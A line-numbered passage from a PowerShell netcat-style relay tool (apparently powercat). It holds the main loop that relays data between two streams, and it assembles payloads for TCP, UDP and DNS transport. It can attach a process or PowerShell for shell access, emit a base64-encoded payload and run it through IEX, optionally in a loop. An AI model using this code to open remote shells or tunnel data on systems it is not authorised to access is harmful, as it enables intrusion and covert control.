718.       "Bytes" {$FuncVars["OutputBytes"] += $Data}
719.     }
720.     return $FuncVars
721.   }
722.   function Close_Console
723.   {
724.     param($FuncVars)
725.     if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]}
726.     elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]}
727.     return
728.   }
729.   ########## CONSOLE FUNCTIONS ##########
730.  
731.   ########## MAIN FUNCTION ##########
732.   function Main
733.   {
734.     param($Stream1SetupVars,$Stream2SetupVars)
735.     try
736.     {
737.       [byte[]]$InputToWrite = @()
738.       $Encoding = New-Object System.Text.AsciiEncoding
739.       if($i -ne $null)
740.       {
741.         Write-Verbose "Input from -i detected..."
742.         if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
743.         elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
744.         elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
745.         else{Write-Host "Unrecognised input type." ; return}
746.       }
747.      
748.       Write-Verbose "Setting up Stream 1..."
749.       try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
750.       catch{Write-Verbose "Stream 1 Setup Failure" ; return}
751.      
752.       Write-Verbose "Setting up Stream 2..."
753.       try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
754.       catch{Write-Verbose "Stream 2 Setup Failure" ; return}
755.      
756.       $Data = $null
757.      
758.       if($InputToWrite -ne @())
759.       {
760.         Write-Verbose "Writing input to Stream 1..."
761.         try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
762.         catch{Write-Host "Failed to write input to Stream 1" ; return}
763.       }
764.      
765.       if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
766.      
767.       Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
768.       while($True)
769.       {
770.         try
771.         {
772.           $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
773.           if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
774.           if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
775.           $Data = $null
776.         }
777.         catch
778.         {
779.           Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
780.         }
781.        
782.         try
783.         {
784.           $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
785.           if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
786.           if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
787.           $Data = $null
788.         }
789.         catch
790.         {
791.           Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
792.         }
793.       }
794.     }
795.     finally
796.     {
797.       try
798.       {
799.         #Write-Verbose "Closing Stream 2..."
800.         Stream2_Close $Stream2Vars
801.       }
802.       catch
803.       {
804.         Write-Verbose "Failed to close Stream 2"
805.       }
806.       try
807.       {
808.         #Write-Verbose "Closing Stream 1..."
809.         Stream1_Close $Stream1Vars
810.       }
811.       catch
812.       {
813.         Write-Verbose "Failed to close Stream 1"
814.       }
815.     }
816.   }
817.   ########## MAIN FUNCTION ##########
818.  
819.   ########## GENERATE PAYLOAD ##########
820.   if($u)
821.   {
822.     Write-Verbose "Set Stream 1: UDP"
823.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
824.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
825.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
826.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")    
827.     if($l){$InvokeString = "Main @('',`$True,'$p','$t') "}
828.     else{$InvokeString = "Main @('$c',`$False,'$p','$t') "}
829.   }
830.   elseif($dns -ne "")
831.   {
832.     Write-Verbose "Set Stream 1: DNS"
833.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
834.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
835.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
836.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
837.     if($l){return "This feature is not available."}
838.     else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "}
839.   }
840.   else
841.   {
842.     Write-Verbose "Set Stream 1: TCP"
843.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
844.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
845.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
846.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
847.     if($l){$InvokeString = "Main @('',`$True,$p,$t) "}
848.     else{$InvokeString = "Main @('$c',`$False,$p,$t) "}
849.   }
850.  
851.   if($e -ne "")
852.   {
853.     Write-Verbose "Set Stream 2: Process"
854.     $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n")
855.     $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n")
856.     $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n")
857.     $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n")
858.     $InvokeString += "@('$e')`n`n"
859.   }
860.   elseif($ep)
861.   {
862.     Write-Verbose "Set Stream 2: Powershell"
863.     $InvokeString += "`n`n"
864.   }
865.   elseif($r -ne "")
866.   {
867.     if($r.split(":")[0].ToLower() -eq "udp")
868.     {
869.       Write-Verbose "Set Stream 2: UDP"
870.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
871.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
872.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
873.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")    
874.       if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
875.       elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
876.       else{return "Bad relay format."}
877.     }
878.     if($r.split(":")[0].ToLower() -eq "dns")
879.     {
880.       Write-Verbose "Set Stream 2: DNS"
881.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
882.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
883.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
884.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
885.       if($r.split(":").Count -eq 2){return "This feature is not available."}
886.       elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")}
887.       else{return "Bad relay format."}
888.     }
889.     elseif($r.split(":")[0].ToLower() -eq "tcp")
890.     {
891.       Write-Verbose "Set Stream 2: TCP"
892.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
893.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
894.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
895.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
896.       if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
897.       elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
898.       else{return "Bad relay format."}
899.     }
900.   }
901.   else
902.   {
903.     Write-Verbose "Set Stream 2: Console"
904.     $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n")
905.     $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n")
906.     $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n")
907.     $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n")
908.     $InvokeString += ("@('" + $o + "')")
909.   }
910.  
911.   if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")}
912.   else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")}
913.   $InvokeString = ($FunctionString + $InvokeString)
914.   ########## GENERATE PAYLOAD ##########
915.  
916.   ########## RETURN GENERATED PAYLOADS ##########
917.   if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))}
918.   elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString}
919.   ########## RETURN GENERATED PAYLOADS ##########
920.  
921.   ########## EXECUTION ##########
922.   $Output = $null
923.   try
924.   {
925.     if($rep)
926.     {
927.       while($True)
928.       {
929.         $Output += IEX $InvokeString
930.         Start-Sleep -s 2
931.         Write-Verbose "Repetition Enabled: Restarting..."
932.       }
933.     }
934.     else
935.     {
936.       $Output += IEX $InvokeString
937.     }
938.   }
939.   finally
940.   {
941.     if($Output -ne $null)
942.     {
943.       if($of -eq ""){$Output}
944.       else{[io.file]::WriteAllBytes($of,$Output)}
945.     }
946.   }
947.   ########## EXECUTION ##########
948. }